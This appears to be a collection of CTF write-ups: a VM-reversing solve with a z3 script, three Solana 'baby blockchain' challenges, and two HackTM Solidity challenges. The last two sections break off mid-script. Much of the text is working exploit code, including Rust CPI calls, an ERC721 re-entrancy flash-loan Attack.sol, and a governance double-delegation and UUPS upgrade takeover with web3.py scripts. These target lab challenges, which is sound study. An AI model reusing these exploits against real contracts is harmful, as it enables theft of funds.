0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 133, 137, 39, 72, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 47, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 48, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 49, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 190, 135, 104, 172, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 50, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 51, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 52, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 53, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 188, 209, 165, 38, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 54, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 55, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 56, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 57, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 2, 0, 0, 0, 68, 0, 0, 0, 238, 181, 61, 151, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 2, 0, 0, 0, 65, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 69, 0, 0, 0]

import struct
bytecodes = struct.unpack("<252Q", bytes(LdConst[2:]))


flag=b"b"*64
class VM:
    def __init__(self, bytecodes: list):
        self.stack = []
        self.bytecodes = bytecodes
        self.idx = 0

    def pop(self):
        return self.stack.pop()

    def push(self, value):
        self.stack += [value]

    def go(self):
        while True:

            opcode = (self.bytecodes[self.idx] >> 32) & 255
            arg = self.bytecodes[self.idx] & (2**32 - 1)
            # print(f"opcode: {opcode}, arg: {arg}")
            # input()
            self.execute(opcode, arg)
            

    def execute(self, opcode, arg):
        #b8
        if opcode == 0:
            self.push(arg)
            print(f"push({arg})")
            self.idx += 1

        #b15
        elif opcode == 2:
            self.push(flag[arg])
            print(f"push(flag[{arg}])")
            self.idx += 1


        #b17
        elif opcode == 16:
            a = self.pop()
            b = self.pop()
            c = a + b 
            c = c & (2**64 - 1)
            self.push(c)
            print(f"push(pop({a}) + pop({b}) = {c})")
            self.idx += 1

        #b19
        elif opcode == 17:
            a = self.pop()
            b = self.pop()
            c = a ^ b
            self.push(c)           
            print(f"push(pop({a}) ^ pop({b}) = {c})")
            self.idx += 1


        #b23
        elif opcode == 19:
            a = self.pop()
            b = self.pop()
            c = a & b
            self.push(c)               
            print(f"push(pop({a}) & pop({b}) = {c})")
            self.idx += 1

        #b27
        elif opcode == 21:
            a = self.pop()
            a = a & 255
            b = self.pop()
            c = b >> a
            # c = a >> b
            self.push(c)   
            print(f"push(pop({b}) >> pop({a}) = {c})")
            self.idx += 1

        #b29
        elif opcode == 22:
            a = self.pop()
            a = a & 255
            b = self.pop()
            c = b < a
            # c = b != a
            if c == True:
                self.push(1)
                c = 1
            else:
                self.push(0)  
                c = 0
            print(f"push(pop({b}) < pop({a}) = {c})")
            self.idx += 1
            

        #b34
        elif opcode == 23:
            a = self.pop()
            b = self.pop()
            c = b == a
            if c == True:
                self.push(1)
                c = 1
            else:
                self.push(0)  
                c = 0
            print(f"push(pop({b}) == pop({a}) = {c})")
            self.idx += 1

        #b39
        elif opcode == 48:
            a = self.pop()
            self.push(a)
            self.push(a)
            print(f"dup(top)")
            self.idx += 1

        #b47
        elif opcode == 56:
            self.pop()
            print(f"pop()")
            self.idx += 1


        #b49
        elif opcode == 57:
            a = self.pop()
            b = self.pop()
            self.push(a)
            self.push(b)
            print(f"swap(top)")
            self.idx += 1

        #b51
        elif opcode == 58:
            a = self.pop()
            b = self.pop()
            c = self.pop()
            self.push(b)
            self.push(c)
            self.push(a)
            print(f"swap(top-1)")
            self.idx += 1

       
        #b53
        elif opcode == 64:
            a = self.pop()
            if a == 0:
                self.idx += 1
            else:
                self.idx = arg


        #b57
        elif opcode == 65:
            a = self.pop()
            if a == 0:
                self.idx += 1
            else:
                self.idx += arg

        #b61
        elif opcode == 66:
            a = self.pop()
            if a == 0:
                # local[45] -= local[42]
                self.idx += 1
            else:
                self.idx -= arg

        #b65
        elif opcode == 67:
            self.idx = self.pop()

        #b67
        elif opcode == 68:
            # self.push(local[45] + 1)
            # local[42] = local[46]
            # local[45] = local[42]
            self.push(self.idx+1)
            self.idx = arg


        #b69
        elif opcode == 69:
            # self.push(local[45] + 1)
            # local[46] = 0
            # local[41] = 0
            # local[39] = 0
            print("exit")
            exit(-1)

        #b72
        elif opcode == 70:
            idx += 1

        else:
            self.idx += 1
            print("?")


vm = VM(bytecodes=bytecodes)
vm.go()

python3 VM.py >> result

result

https://gist.github.com/kangsangsoo/5f079e9fb580398bb7381e49d3d23dfb

The observed pattern is that the flag is read four times and then the opcode 255 ("?" output) is encountered after the "==operator.

Therefore, it was thought that putting the==` operator in z3 would work.

The analysis of lines ~678 of the result is as follows:
Since the flag was initialized to b"b" = 98, we can focus on the operations and analyze them as follows:
It seems that the same logic is repeated over and over again, which is fortunate.

flag = b"bbbb"

tmp = flag[0] ^ 0

# 8번 반복
for _ in range(8):
    tmp2 = tmp >> 1
    tmp3 = tmp & 1
    tmp4 = tmp3 ^ 4294967295
    tmp5 = tmp4 + 1
    tmp6 = 4294327160 & tmp5
    tmp7 = tmp2 ^ tmp6
    tmp = tmp7

tmp = flag[1] ^ tmp
# 8번 반복
for _ in range(8):
    tmp2 = tmp >> 1
    tmp3 = tmp & 1
    tmp4 = tmp3 ^ 4294967295
    tmp5 = tmp4 + 1
    tmp6 = 4294327160 & tmp5
    tmp7 = tmp2 ^ tmp6
    tmp = tmp7

tmp = flag[2] ^ tmp
# 8번 반복
for _ in range(8):
    tmp2 = tmp >> 1
    tmp3 = tmp & 1
    tmp4 = tmp3 ^ 4294967295
    tmp5 = tmp4 + 1
    tmp6 = 4294327160 & tmp5
    tmp7 = tmp2 ^ tmp6
    tmp = tmp7

tmp = flag[3] ^ tmp
# 8번 반복
for _ in range(8):
    tmp2 = tmp >> 1
    tmp3 = tmp & 1
    tmp4 = tmp3 ^ 4294967295
    tmp5 = tmp4 + 1
    tmp6 = 4294327160 & tmp5
    tmp7 = tmp2 ^ tmp6
    tmp = tmp7

2209421562 == tmp

solve.py

from z3 import *


def enc(g, f):
    tmp = 0
    for i in range(4):
        tmp = tmp ^ g[i]
        for j in range(8):
            tmp2 = tmp >> 1
            tmp3 = tmp & 1
            tmp4 = tmp3 ^ 4294967295
            tmp5 = tmp4 + 1
            tmp6 = 4294327160 & tmp5
            tmp7 = tmp2 ^ tmp6
            tmp = tmp7
    s.add(tmp == f)

flag = [BitVec(f'flag{i}', 64) for i in range(58)]
ans = [2209421562, 4020009855, 2511570847, 825727845, 2747945899, 2434240953, 3923412385, 1510700589, 3658116609, 1210550661, 2892531646, 648401340, 2537403886]

s = Solver()

s.add((((flag[0] << 48) | (flag[1] << 40) | (flag[2] << 32) | (flag[3] << 24) | (flag[4] << 16) | (flag[5] << 8) | flag[len(flag)-1]) ^ 29670774015617385) == 7049012482871828)

for i in flag:
    s.add(i>=0x20)
    s.add(i<=0x7f)


for i in range(13):
    enc(flag[6+4*i:6+4*i+4], ans[i])

print(s.check())
A = (s.model())

for i in flag:
    print(chr(A[i].as_long()), end="")

pbctf{enjoy haccing blockchains? work for Zellic:pepega:!}

Idek CTF 2023 pwn - (baby blockchain 1,2,3)

gss1 — Sun, 19 Feb 2023 21:54:52 +0900

I am writing write-ups of blockchain challenges because it is my goal.

As Otter Sec sponsored IdekCTF, there are three solana challenges.

The CTF was the first time I encountered Solana and Rust.

Considering that even a noob(me) could solve the problem, it can be thought that it was very easy to solve.

I found it interesting that by checking the diff between problems 1, 2, and 3, I was able to find vulnerabilities.

baby blockchain 1

https://github.com/idekctf/idekctf2022/tree/main/blockchain/baby-1

Analysis

main.rs

    if user_token_account.amount > 200 {
        writeln!(socket, "congrats!")?;
        if let Ok(flag) = env::var("FLAG") {
            writeln!(socket, "flag: {:?}", flag)?;

To gain flag, balance of user_account is greater than 200

Looking into lib.rs, we find two function that has token::transfer.

inside attempt

            token::transfer(withdraw_ctx, record.tries as u64)?;

inside deposit

        token::transfer(withdraw_ctx, amount)?;

record.tries was initialized by 3 and when called it decreases by 1.

As I thought it is difficult to fill user_account with 200 by attempt, I examined deposit closely.

Root Cause

deposit is a function that sends token ffrom reserve to user.

In reserve, there exists an admin who manage the reserve(maybe?)

Therefore, withdrawing token from the reserve should only be allowd for admin.

However, it execute token::transfer without checking if admin == user

    // where is verfication?
    pub fn deposit(ctx: Context<Deposit>, amount: u64) -> Result<()> {
        let reserve_bump = [*ctx.bumps.get("reserve").unwrap()];
        let signer_seeds = [
            b"RESERVE",
            reserve_bump.as_ref()
        ];
        let signer = &[&signer_seeds[..]];

        let withdraw_ctx = CpiContext::new_with_signer(
            ctx.accounts.token_program.to_account_info(),
            Transfer {
                from: ctx.accounts.reserve.to_account_info(),
                to: ctx.accounts.user_account.to_account_info(),
                authority: ctx.accounts.reserve.to_account_info()
            },
            signer
        );
        token::transfer(withdraw_ctx, amount)?;
        Ok(())
    }

#[derive(Accounts)]
pub struct Deposit<'info> {
    #[account(
        mut,
        seeds = [ b"CONFIG" ],
        bump,
        has_one = admin
    )]
    pub config: Account<'info, Config>,

    #[account(
        mut,
        seeds = [ b"RESERVE" ],
        bump,
        constraint = reserve.mint == mint.key(),
    )]
    pub reserve: Account<'info, TokenAccount>,

    #[account(
        mut,
        seeds = [b"account", user.key().as_ref()],
        bump,
        constraint = user_account.mint == mint.key(),
        constraint = user_account.owner == user.key(),
    )]
    pub user_account: Account<'info, TokenAccount>,

    pub mint: Account<'info, Mint>,

    #[account(mut)]
    pub admin: AccountInfo<'info>, // here
    
    #[account(mut)]
    pub user:  Signer<'info>,
    pub token_program: Program<'info, Token>,
    pub system_program: Program<'info, System>,
    pub rent: Sysvar<'info, Rent>,
}

Solve

        // your instruction goes here
        let cpi_accounts2 = chall::cpi::accounts::Deposit {
            config: ctx.accounts.config.to_account_info(),
            reserve: ctx.accounts.reserve.to_account_info(),
            user_account: ctx.accounts.user_account.to_account_info(),
            mint: ctx.accounts.mint.to_account_info(),
            admin: ctx.accounts.admin.to_account_info(),
            user: ctx.accounts.user.to_account_info(),
            token_program: ctx.accounts.token_program.to_account_info(),
            system_program: ctx.accounts.system_program.to_account_info(),
            rent: ctx.accounts.rent.to_account_info(),
        };
        let cpi_ctx2 = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts2);
        chall::cpi::deposit(cpi_ctx2, 200 as u64)?;

baby blockchain 2

https://github.com/idekctf/idekctf2022/tree/main/blockchain/baby-2

Analysis

main.rs is identical to blockchain-1

The diff result of lib.rs is as follows:

Since admin should be a Signer, it can be considered that vulnerability of baby-blockchain 1 has been fixed.

So we should look at the attempt that contains token::transfer.

Root Cause

lib.rs

Rust is known that it allow user not to overflow and underflow.

Actually, one can avoid that.

https://stackoverflow.com/questions/31215139/how-can-integer-overflow-protection-be-turned-off

When entering, record decreases by 1.

If record is zero, record minus one would be 255

    pub fn attempt(ctx: Context<Attempt>) -> Result<()> {
        let record = &mut ctx.accounts.record;
        msg!("[CHALL] attempt.tries {}", record.tries);
        if record.tries > 0 {
            let reserve_bump = [*ctx.bumps.get("reserve").unwrap()];
            let signer_seeds = [
                b"RESERVE",
                reserve_bump.as_ref()
            ];
            let signer = &[&signer_seeds[..]];

            let withdraw_ctx = CpiContext::new_with_signer(
                ctx.accounts.token_program.to_account_info(),
                Transfer {
                    from: ctx.accounts.reserve.to_account_info(),
                    to: ctx.accounts.user_account.to_account_info(),
                    authority: ctx.accounts.reserve.to_account_info()
                },
                signer
            );
            token::transfer(withdraw_ctx, record.tries as u64)?;
        }
        record.tries -= 1; // here
        Ok(())
    }

Solve

        for _ in 0..6 {
                let cpi_accounts = chall::cpi::accounts::Attempt {
                    reserve: ctx.accounts.reserve.to_account_info(),
                    record: ctx.accounts.user_record.to_account_info(),
                    user_account: ctx.accounts.user_account.to_account_info(),
                    mint: ctx.accounts.mint.to_account_info(),
                    user: ctx.accounts.user.to_account_info(),
                    token_program: ctx.accounts.token_program.to_account_info(),
                };
                let cpi_ctx = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts);
                chall::cpi::attempt(cpi_ctx)?;
        }

baby blockchain 3

https://github.com/idekctf/idekctf2022/tree/main/blockchain/baby-3

Analysis

lib.rs

The vulnerabiltiy of blockchain-2 is fixed!

inside Initialize

init > init_if_needed

inside Deposit

admin and user should be both signer.

Root Cause

inif_init_need's description

https://docs.rs/anchor-lang/latest/anchor_lang/derive.Accounts.html

When using init_if_needed, you need to make sure you properly protect yourself against re-initialization attacks. You need to include checks in your code that check that the initialized account cannot be reset to its initial settings after the first time it was initialized

When constraint of account is init, it cannot be re-initialization.

But, it can be re-initialization with init_if_needed. (re-initialization attack)

By calling initialize, we can change the admin of reserve to user.

Solve

        let cpi_accounts = chall::cpi::accounts::Initialize {
            config: ctx.accounts.config.to_account_info(),
            reserve: ctx.accounts.reserve.to_account_info(),
            mint: ctx.accounts.mint.to_account_info(),
            admin:ctx.accounts.user.to_account_info(),
            token_program: ctx.accounts.token_program.to_account_info(),
            system_program: ctx.accounts.system_program.to_account_info(),
            rent: ctx.accounts.rent.to_account_info(),
        };
        
        let cpi_ctx = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::initialize(cpi_ctx)?;

        let cpi_accounts2 = chall::cpi::accounts::Deposit {
            config: ctx.accounts.config.to_account_info(),
            reserve: ctx.accounts.reserve.to_account_info(),
            user_account: ctx.accounts.user_account.to_account_info(),
            mint: ctx.accounts.mint.to_account_info(),
            admin: ctx.accounts.user.to_account_info(),
            user: ctx.accounts.user.to_account_info(),
            token_program: ctx.accounts.token_program.to_account_info(),
            system_program: ctx.accounts.system_program.to_account_info(),
            rent: ctx.accounts.rent.to_account_info(),
        };
        let cpi_ctx2 = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts2);
        chall::cpi::deposit(cpi_ctx2, 201 as u64)?;

HackTM CTF Quals 2023 - smart contract(Dragon Slayer, Diamond Heist)

gss1 — Sun, 19 Feb 2023 21:04:27 +0900

I solved 2 out of 2 smart contract challenges in HackTM CTF Quals 2023.

Dragon Slayer

https://github.com/kangsangsoo/CTF-Writeups/blob/main/dragon_slayer_contracts.zip

Analysis

We should fight against Dragon.
Knight's sword and shield are very very weak.
We can purchase some equips through shop.
The equips that make us win against Dragon is very very expensive. (We have only 10 ether, but they are 1_000_000 ether)
There is Bank and it could be helpful to make money.

Root Cause

BankNote inherites ERC721 and use _safeMint() in mint() of BankNote.

    function mint(address to, uint256 tokenId) public onlyOwner {
        _safeMint(to, tokenId); // why safeMint?
    }

It is known that _safeMint() of ERC721 is vulnerable to re-entrancy attack because it calls onERC721Received() which behaves like callback. In addition, contracts of challenge do not have modifiers that protect them from re-entrancy.

https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC721/ERC721.sol#L247

Exploit

In Bank.sol, the number of bankNote.mint() call is three.

Among them, I chose split() because it is not implemented correctly Checks Effects Interaction.

        for (uint i = 0; i < amounts.length; i++) {
            uint value = amounts[i];

            _ids.increment();
            uint bankNoteId = _ids.current();

            bankNote.mint(msg.sender, bankNoteId); // re
            bankNoteValues[bankNoteId] = value; 
            totalValue += value;
        }

        require(totalValue == bankNoteValues[bankNoteIdFrom], "NOT_ENOUGH");

Part1 - mint a banknote whose amount is zero.

At merge() of Bank.sol, when bankNoteIdsFrom is empty array, it would mint a banknote whose amount is zero.

Part2 - flashloan through split

By writing the internal code of onERC721Received() which do re-entrancy, split() can achieve the same effect as flashloan.

For example, assuming that amounts = [1_000_000 ether, 0] and when only i = 1, we catch the callback, we can send 1_000_000 ether to bankNoteValues[BankNoteIdFrom] by transferPartial() before exiting the callback.

Then, we can bypass require(totalValue == bankNoteValues[bankNoteIdFrom], "NOT_ENOUGH");

This mechanism is very similar to flash loan.

Part3 - Summary

flashloan through split()
transform BankNote to GoldCoin
purchases equips whose price 1_000_000 ether
fight agianst Dragon
sell equips that bought for fight
transfrom GoldCoin to BankNote
repay BankNote through transferPartial()

Attack.sol

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;

import "./openzeppelin-contracts/access/Ownable.sol";

import "./Shop.sol";
import "./Bank.sol";
import "./Dragon.sol";
import "./Setup.sol";
import "./Knight.sol";
import "./GoldCoin.sol";

contract Attack {

    Bank public bank;
    Setup public setup;
    Knight public knight;
    GoldCoin public goldCoin;

    constructor(address _bank, address _setup, address _knight, address _goldCoin) {
        knight = Knight(_knight);
        setup = Setup(_setup);
        bank = Bank(_bank);
        setup.claim();
        goldCoin = GoldCoin(_goldCoin);
    }

    function attack1() public {
        bank.merge(new uint[](0)); // id = 1
        uint[] memory mem = new uint[](3);
        mem[0] = 2_000_000 ether; // id = 2
        mem[1] = 0; // id = 3
        mem[2] = 0; // id = 4
        bank.split(1, mem); 
    }

    function onERC721Received(address a, address b, uint256 c, bytes calldata d) public returns (bytes4) {
        if(c==3) {
            bank.withdraw(2);

            GoldCoin(goldCoin).transfer(address(knight), 2_000_000 ether);

            knight.buyItem(3);
            knight.buyItem(4);

            knight.fightDragon();
            knight.fightDragon();

            knight.sellItem(3);
            knight.sellItem(4);

            knight.bankDeposit(2_000_000 ether); // id = 4
            knight.bankTransferPartial(4, 2_000_000 ether, 1);
        }
        return this.onERC721Received.selector;
    }

    function onERC1155Received(address, address, uint256, uint256, bytes calldata) public pure returns (bytes4) {
        return this.onERC1155Received.selector;
    }
}

attack.py

import json
from web3 import Web3
from solc import compile_source
from Crypto.Util.number import *
w3 = Web3(Web3.HTTPProvider("http://34.141.16.87:30101/5f4f62c4-5ae8-40ec-9649-5c05deb6b47d"))

#Check Connection
t=w3.isConnected()
print(t)

# Get env
prikey = '0x91a200bc38507358c63cbe8e79531065367a33353500da205b2992267fe0eb01'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

SETUP = "0x785ed095a7B38aD8ef99675dCB7452cAA10B9483"
KNIGHT = Web3.toChecksumAddress(hex(bytes_to_long(w3.eth.get_storage_at(SETUP, 0)[12:])))

def bank():
    f = open('knight_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=KNIGHT, abi=abi)
    func_call = contract.functions.bank().call()
    return func_call   

def goldcoin():
    f = open('bank_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=BANK, abi=abi)
    func_call = contract.functions.goldCoin().call()
    return func_call 

def attack_deploy():
    f = open("attack_abi", "r"); contract_abi= f.read(); f.close()
    f = open("attack_bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(BANK, SETUP, KNIGHT, GOLDCOIN).buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

def attack():
    f = open('attack_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=ATTACK, abi=abi)
    func_call = contract.functions["attack1"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })

    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

BANK = bank()
GOLDCOIN = goldcoin()
ATTACK = attack_deploy()
attack()

HackTM{n0w_g0_g3t_th4t_run3_pl4t3b0dy_b4af5ff9eab4b0f7}

Diamond Heist

https://github.com/kangsangsoo/CTF-Writeups/blob/main/diamond_heist_contracts.zip

Analysis

We should make diamond Vault to Setup contract
Vault contract inherits UUPSUpgradeable.
Vault contract's governance consists of SaltyPretzel's voting utils.
Vault contract has flashloan function.
Vault contract overrides _authorizeUpgrade()

Root Cause

It is well-known bug called sushi-swap double spending bug

https://medium.com/bulldax-finance/sushiswap-delegation-double-spending-bug-5adcc7b3830f

The voting power do not move when token is transferred.

When first called delegate(), currentDelegate becomes 0 in _delegate(), which causes it to pass the first if statement in _moveDelegate() and only enter the second.

So we can concentrate voting power in one address by continuously transferring tokens to a new wallet.

Exploit

Part 1 - charging voting power

I prepared private keys over 100 and charged my voting power.

Flow of token

0 > 1 > 2 > ... > 99 > 100 > 101 ..

Flow of voting power

0 > ME, 1 > ME, 2 > ME, ..., 100 > ME, 101 > ME

web3py

pk = hex(1).ljust(66, "0")
addr=w3.eth.account.from_key(pk).address
transfer(myAddr, addr, prikey)
send_ether(myAddr, addr, prikey, 120 * 10 ** 18)
delegate(addr, Attack, pk)

for i in range(1, 110):
    pk = hex(i).ljust(66, "0")
    nxt_pk = hex(i+1).ljust(66, "0")
    addr=w3.eth.account.from_key(pk).address
    nxt_addr=w3.eth.account.from_key(nxt_pk).address
    transfer(addr, nxt_addr, pk)
    send_ether(addr, nxt_addr, pk, 120 * 10 ** 18 - (10 ** 18 * i)) 
    delegate(nxt_addr, Attack, nxt_pk)

Part 2 - upgrade implement contract address

https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/proxy/utils/UUPSUpgradeable.sol#L68

If we satisfy below require statement, we could change implementation address.

    function _authorizeUpgrade(address) internal override view {
        require(msg.sender == owner() || msg.sender == address(this));
        require(IERC20(diamond).balanceOf(address(this)) == 0);
    }

First, we should new implement contract code for transferring diamond from Vault to me.

I wrote new_implement.sol by adding Vault.sol to transfer function

// ...
// vault.sol 
	function transfer(address to, uint amount) external {
        diamond.transfer(to, amount);
    }
// ...
// ...

Beforehand, I deployed this contract on blockchain.

And I executed flashloan() of Vault to make vault's balance of diamond zero, then we re-enter governanceCall() through callback of onFlashloan().

    function onFlashLoan(
        address initiator,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata data
    ) external returns (bytes32) {
            vault.governanceCall(abi.encodeWithSignature("upgradeTo(address)", new_impl));
            IERC20(diamond).transfer(address(vault), 100);
    }

Part3 - exploit diamond

Just execute transfer() that we generated by upgradeTo()

vault.governanceCall(abi.encodeWithSignature("transfer(address,uint256)", setup, 100));

Attack.sol

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "./VaultFactory.sol";
import "./Vault.sol";
import "./Diamond.sol";
import "./SaltyPretzel.sol";
import "./Setup.sol";
import "./SaltyPretzel.sol";
import "./openzeppelin-contracts/interfaces/IERC3156FlashBorrower.sol";

contract Attack is IERC3156FlashBorrower{
    uint constant public AUTHORITY_THRESHOLD = 10_000 ether;
    address setup;
    Vault public vault;
    Diamond public diamond;
    SaltyPretzel public saltyPretzel;
    address new_impl;
    constructor(address _to, address _setup, address _vault, address _diamond, address _saltyPretzel, address _new_impl) {
        setup = _setup;
        Setup(_setup).claim();
        vault = Vault(_vault);
        diamond = Diamond(_diamond);
        saltyPretzel = SaltyPretzel(_saltyPretzel);
        saltyPretzel.transfer(_to, 100 ether);
        new_impl = _new_impl;
    }

    function onFlashLoan(
        address initiator,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata data
    ) external returns (bytes32) {
            vault.governanceCall(abi.encodeWithSignature("upgradeTo(address)", new_impl));
            IERC20(diamond).transfer(address(vault), 100);
    }

    uint public step = 0;
    function attack1() public {
        if(step==0) vault.flashloan(address(diamond), 100, address(this));
        if(step==1) vault.governanceCall(abi.encodeWithSignature("transfer(address,uint256)", setup, 100));
        step += 1;

    }
}

attack.py

import json
from web3 import Web3
from solc import compile_source
from Crypto.Util.number import *
from pwn import *
# r = remote("34.141.16.87", 30200)
# r.sendlineafter("action", "1")

w3 = Web3(Web3.HTTPProvider("http://34.141.16.87:30201/6641d991-702c-43ad-9d84-c3b4f58ad327"))

#Check Connection
t=w3.isConnected()
print(t)

# Get env
prikey = '0x7f26c94f0ef1686a66825e465f13d526f5a10b26d69ecc19806caeacdc9b9ca5'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

Setup = "0x96B2D47F07Cf1eb6c1391dB72C0632dD0E4fAEf4"
Vault = Web3.toChecksumAddress(hex(bytes_to_long(w3.eth.get_storage_at(Setup, 1))))
Diamond = Web3.toChecksumAddress(hex(bytes_to_long(w3.eth.get_storage_at(Setup, 2))))
SaltyPretzel = Web3.toChecksumAddress(hex(bytes_to_long(w3.eth.get_storage_at(Setup, 3))))

def balance():
    f = open('salty_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=SaltyPretzel, abi=abi)
    func_call = contract.functions.balanceOf(myAddr).call()
    print(func_call)

def deploy_new_impl():
    f = open("new_impl_abi", "r"); contract_abi= f.read(); f.close()
    f = open("new_impl_bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor().buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

def init():
    f = open('new_impl_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=New_impl, abi=abi)
    func_call = contract.functions["initialize"](Diamond, SaltyPretzel).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })

    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def deploy_attack():
    f = open("attack_abi", "r"); contract_abi= f.read(); f.close()
    f = open("attack_bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(myAddr, Setup, Vault, Diamond, SaltyPretzel, New_impl).buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

def attack():
    f = open('attack_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=Attack, abi=abi)
    func_call = contract.functions.attack1().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })

